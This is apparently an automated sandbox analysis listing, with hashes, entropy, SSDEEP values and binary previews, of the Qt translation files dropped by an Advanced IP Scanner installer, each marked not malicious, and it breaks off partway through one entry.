Category:	dropped
Size (bytes):	23348
Entropy (8bit):	5.657948878761793
Encrypted:	false
SSDEEP:	384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
MD5:	EFD6D076AAD193007E77BFA1BB46E3DA
SHA1:	92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
SHA-256:	2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
SHA-512:	11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
Malicious:	false
Preview:	<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9...y......y...i..%......0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.\|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ko_kr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	22516
Entropy (8bit):	5.64342773223904
Encrypted:	false
SSDEEP:	384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
MD5:	C09D31E3E2A0F6B673F8B26AA49B8E9E
SHA1:	829B459D3642E84D0F0E0AE30D16203C583B1A88
SHA-256:	30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
SHA-512:	DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
Malicious:	false
Preview:	<.d....!..`...B..........E....;.......;...-...;...!...;.......;..5....O..H,...[..D....^..&5...^..Av..(5......G....\|..H,..? ..K...2:..N:......V...6Q.._...I....... .......?G...y..?........_.......6......E....t.."#...t..?....t..G......2....j......5t...#..@...4s..H5..FY..f...&U......6................K...~..(....`..,....e..Gw......G........\|. =...7...y......y......%...v..0.....+.......+.....~.+....,.+......+.....%.G.......G...."i.H0...G..Hw9.....Hw9.....I.... ..J6......J6....".J6......J6...9..LD......L.b..H..M.S..3^.R.......V....&w.Wi...G,.W.T...K.Z.\|..@..[f3..C..gc....0.w0K..8...H....I......H....T...I..."......~..+... d..7K...T..%...2....k......F.......K..9.E..2..L.#..M..M$o...n.e.......l8...+a...^..9...I...........4.......A5......F}..>...-..>......3..%...l...;.......-..5.l..J..AV... q.y....E#...0..A.......A.......F)..tb..................G......B.......0x......>..(....A..1V...!R.R....'..W.<..K[.f.~...@......)...1........^..*....5...=..........c..7..;6...L..q.J..>...I....o..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lt_lt.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28545
Entropy (8bit):	4.714189994601161
Encrypted:	false
SSDEEP:	384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
MD5:	2AADC93C38DBB7E1D048B05B63133217
SHA1:	66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
SHA-256:	A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
SHA-512:	63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
Malicious:	false
Preview:	<.d....!..`...B..........[...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H...y......y......%..%V..0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.\|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lv_lv.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27649
Entropy (8bit):	4.760709648438812
Encrypted:	false
SSDEEP:	384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
MD5:	C41CF1ECCEF6EB2CB6BBAF02A383BC28
SHA1:	B2E5D8721D04232F7219AC00496379C14576E33D
SHA-256:	61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
SHA-512:	341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
Malicious:	false
Preview:	<.d....!..`...B..........W....;...X...;.......;...U...;..!?...;..B....O..Z....[..V....^../....^..Rh..(5......G....$..H,..Op..K...?T..N:......V...DQ.._...\.......(.......O....y..P........o.......t......W....t..s...t..Pv...t..Zo.....@@...j...#..5t......@...B...H5..X...f.../.......E....................~..2....`..6....e..Y.......Z........(. =...F...y......y...A..%..$...0..$..+.......+.......+....<.+......+....&..G.... M.G......H0...ZC.Hw9...q.Hw9...c.I....(r.J6....".J6......J6......J6...H..LD......L.b..Z..M.S..@..R.....\.V..../..Wi...Y..W.T.....Z.\|..QE.[f3..U..gc......w0K..G<..H...%.......[....T......."..4T...~..6b.. d..E{...T......2....+......X......._M.9.E..?..L.#..a..M$o.....e.......l8...5....^..H...I....b......B4......R!......X...>...=..>......3../K..l...JN......9p.5.l..^C.AV...(1.y....V....0..R.......Q.......XM..tb..4................s......SS......<.......N..(....R..1V...)L.R....1..W.<..^..f.~..".......3...1........^..5e...5..............c..E..;6...`g.q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nb_no.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26887
Entropy (8bit):	4.711499642917058
Encrypted:	false
SSDEEP:	768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
MD5:	D0C083D4760D44DB80A0AEDE7862D5EC
SHA1:	155B7B067596D105B0BC4471BD654F1D9B720D20
SHA-256:	186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
SHA-512:	B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
Malicious:	false
Preview:	<.d....!..`...B..........U....;.......;...U...;...g...;.. ....;..@....O..W....[..S....^...)...^..O...(5......G.......H,..L...K...=H..N:......V...B..._...X.......'.......M....y..M................d......T....t..)5...t..M....t..W......>....j...5..5t......@...?...H5..U...f....I......B........i.......%...~..1<...`..5 ...e..W.......W+......... =...C...y......y...3..%..#v..0..#..+.....s.+.......+......+......+....%Q.G.....A.G....)..H0...WW.Hw9...C.Hw9...s.I....'<.J6......J6......J6......J6...F/.LD......L.b..W..M.S..>..R.....".V.....o.Wi...V..W.T.....Z.\|..N..[f3..R^.gc....N.w0K..D...H...$Q......Xz...T......."..2....~..4... d..C=...T..,...2...........V ......\K.9.E..=..L.#..^..M$o.....e.......l8...4i...^..Fb..I....8......@.......O.......U...>......>...f..3..-...l...G.......7..5.l..[9.AV...&..y....T%...0..PT......OM......Uy..tb..3........?.......g......P.......:.......K..(....O..1V...(..R....0;.W.<..[..f.~.. .......2...1........^..3....5..........x...c..C..;6...]m.q.J..Lh..I....O..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nl_nl.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28029
Entropy (8bit):	4.645006029092153
Encrypted:	false
SSDEEP:	384:nsoeTpwn8BLKep+1uYLGPlUMpitDd0FoTGv8QAyEDPQRBHYerHcgDOIq0IDbn8:nsoeTpXr+KiBd0qTayPQRdBv
MD5:	1DCBBF653BCB4D127D902EAB60CBB42A
SHA1:	BDC0ACD9FEE35B3F1446210A45C5B20ED9987F8A
SHA-256:	F1C9FB8580866B3066DD4BA9A559F3161B4E3240831A8439F9720B12B40FA010
SHA-512:	9A85094294FB5884BDD548E7BEDFCB97760ABE61ED76AAC5EF2E7AF6127EBEC33D1F16FF3DB7FC59FB294C12F3E78E2547BABB4A992864B13CC3BAC7DB0C8F22
Malicious:	false
Preview:	<.d....!..`...B..........YP...;.......;.......;.......;..!o...;..C....O..\....[..W....^..0)...^..S...(5......G....H..H,..P...K...@P..N:...J..V...EA.._...]B......) ......P....y..QM...............R......Y&...t......t..Q....t..[......A,...j......5t......@...C...H5..Y...f...0I......E....................~..3....`..7....e..[;......[c.......B. =...F...y......y......%..$..*.0..%..+.....5.+.......+....h.+......+....&..G.... ..G....+-.H0...[..Hw9...S.Hw9.....I....(..J6....x.J6......J6......J6...I..LD......L.b..[..M.S..A..R.......V....0s.Wi...Z..W.T.....Z.\|..R..[f3..Vn.gc....Z.w0K..H...H...%.......\....T...9..."..5....~..74.. d..Fg...T......2....7......ZP......`..9.E..@..L.#..cO.M$o.....e.......l8...6....^..I...I....Z......CF......Sw......Z...>...m..>......3../...l...K@......:>.5.l.._..AV...(q.y....Xa...0..TF......S9......Y...tb..5................Q......T.......=.......O`.(....S..1V...)..R....2..W.<..`%.f.~.."4......4...1....A...^..6;...5..............c..F..;6...a..q.J..P,..I....=..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pl_pl.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28357
Entropy (8bit):	4.7436866012778625
Encrypted:	false
SSDEEP:	384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
MD5:	45864510329D981D80C616641357FEFF
SHA1:	C4EB7D6D98D29656FA2DE8E9923750556408E865
SHA-256:	3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
SHA-512:	93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G...y......y......%..%~..0..%..+.....;.+......+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.\|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pt_br.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28217
Entropy (8bit):	4.655652026218731
Encrypted:	false
SSDEEP:	768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
MD5:	C8AF2228F3F331635F1E4E55E1C9FD32
SHA1:	9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
SHA-256:	16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
SHA-512:	DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..DV...O..\....[..X....^..0o...^..Td..(5......G....v..H,..QV..K...@...N:...h..V...E..._...^"......)N......Q....y..Q.......................Y....t..+....t..Rl...t..\k.....A....j......5t......@...C...H5..Z...f...0.......Fd...................~..3j...`..8....e..[.......\........N. =...G...y......y...Y..%..%...0..%E.+.....;.+.......+....n.+......+....&..G.... ..G....+a.H0...\A.Hw9.....Hw9.....I....(..J6....j.J6......J6......J6...JM.LD......L.b..\..M.S..B..R.......V....0..Wi...[..W.T.....Z.\|..SA.[f3..W..gc....D.w0K..H...H...%.......]....T...A..."..5r...~..7... d..F....T......2....G......Z.......as.9.E..A..L.#..d..M$o.....e.......l8...7E...^..J...I....^......C.......T.......Z...>...Y..>......3..0...l...L.......:..5.l..`..AV...(..y....X....0..T.......S.......ZW..tb..60......................US......>(......P..(....T..1V...)..R....2_.W.<..`..f.~.."T......4...1....;...^..6....5..............c..GF.;6...b..q.J..P...I....1..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ro_ro.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28132
Entropy (8bit):	4.6803756692053184
Encrypted:	false
SSDEEP:	384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
MD5:	2DB27B87481EDE8D4FE8C92431A5C5AC
SHA1:	0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
SHA-256:	A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
SHA-512:	B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;...O...;.. K...;.."%...;..D....O..\....[..Xh...^..0....^..T,..(5......G.......H,..Q...K...@...N:......V...E..._...].......).......Q[...y..Q.......................Y....t..+....t..RD...t..\+.....A....j.. ...5t......@...C...H5..ZU..f...0.......F................E...~..3....`..8d...e..[.......[........t. =...G...y......y......%..%...0..%..+.....{.+.....0.+......+....h.+....'u.G....!+.G....+..H0...\..Hw9.....Hw9...Q.I....)r.J6......J6....>.J6......J6...JY.LD......L.b..\X.M.S..BR.R.......V....1..Wi...[L.W.T...5.Z.\|..S..[f3..V..gc....z.w0K..H...H...&.......]<...T...q..."..5....~..7... d..G....T../I..2....e......Z.......a..9.E..AL.L.#..c..M$o.....e.....B.l8...7....^..J...I....b......C.......S.......Z}..>...y..>......3..0q..l...L.......;..5.l..`..AV...)'.y....X....0..T.......S.......Z...tb..6........I..............U.......>p......O..(....TR.1V...*h.R....2..W.<..`..f.~..".......5`..1........^..7....5..............c..G^.;6...b?.q.J..P...I....s..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ru_ru.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28292
Entropy (8bit):	5.300323619618019
Encrypted:	false
SSDEEP:	384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
MD5:	70059C7809B9DB196A6A58588536B7D6
SHA1:	6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
SHA-256:	7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
SHA-512:	EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
Malicious:	false
Preview:	<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)\|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8\|...e..\M......\s......... =...G...y...b..y...%..%..%X..0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sk_sk.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27607
Entropy (8bit):	4.7796924802259895
Encrypted:	false
SSDEEP:	768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
MD5:	3AB470D0817DA632BCDA59AB7C24C08B
SHA1:	C2A643FF68C75A0573ED6A506427F3233848453C
SHA-256:	8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
SHA-512:	A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
Malicious:	false
Preview:	<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t......t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E...y...p..y......%..$B..0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.\|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sl_si.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28344
Entropy (8bit):	4.687451491727224
Encrypted:	false
SSDEEP:	384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
MD5:	950906410E936E0BB5F109082105D7B6
SHA1:	C2B7B811141FDAC2DBC712095759E3C68CE77565
SHA-256:	F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
SHA-512:	FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
Malicious:	false
Preview:	<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G...y......y...]..%..%6..0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sr_latn_rs.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27834
Entropy (8bit):	4.7072414399522335
Encrypted:	false
SSDEEP:	384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
MD5:	A3264DCBED0CEFC981230E4CCADF8807
SHA1:	0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
SHA-256:	6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
SHA-512:	7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7...e..Z.......Z........6. =...Fo..y......y...]..%..$...0..$..+.....G.+.......+....x.+......+....&..G.... ..G......H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.\|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sv_se.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27099
Entropy (8bit):	4.717079738585517
Encrypted:	false
SSDEEP:	384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
MD5:	58ACBFB46226E1833250D5F5A7CE7D6E
SHA1:	5711848C2E2E5D5144B5F965A0F856611773A7F4
SHA-256:	7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
SHA-512:	DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
Malicious:	false
Preview:	<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5\|...e..W.......X.......... =...DI..y......y......%..#...0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.\|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...\|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_th_th.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26514
Entropy (8bit):	5.365287004508335
Encrypted:	false
SSDEEP:	384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
MD5:	31966D909B8293307AC3545ACA55CD13
SHA1:	1B49E43C0109445BA5068E2ED8422CB308D99B12
SHA-256:	81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
SHA-512:	7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
Malicious:	false
Preview:	<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3...e..Um......U.......... =...A...y......y...9..%.."...0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....\|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.\|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T.....2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&\|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_tr_tr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27282
Entropy (8bit):	4.801156368722529
Encrypted:	false
SSDEEP:	768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
MD5:	4DD48C8DA1964B46D4D972244288081A
SHA1:	1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
SHA-256:	572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
